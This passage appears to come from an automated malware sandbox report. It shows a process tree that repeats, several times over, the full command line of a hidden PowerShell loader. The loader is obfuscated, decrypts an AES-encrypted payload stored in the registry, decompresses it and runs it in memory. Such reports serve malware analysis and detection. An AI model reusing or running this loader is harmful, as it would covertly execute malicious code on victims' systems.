($XVbaw)))
                                                                                                                          6⤵
                                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Hide Artifacts: Hidden Window
                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:1164
                                                                                                                        • C:\Windows\$sxr-powershell.exe
                                                                                                                          "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1200).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
                                                                                                                          6⤵
                                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Hide Artifacts: Hidden Window
                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:2000
                                                                                                                        • C:\Windows\$sxr-powershell.exe
                                                                                                                          "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1200).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
                                                                                                                          6⤵
                                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Hide Artifacts: Hidden Window
                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:3928
                                                                                                                        • C:\Windows\$sxr-powershell.exe
                                                                                                                          "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1200).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
                                                                                                                          6⤵
                                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Hide Artifacts: Hidden Window
                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4724
                                                                                                                        • C:\Windows\$sxr-powershell.exe
                                                                                                                          "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1200).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 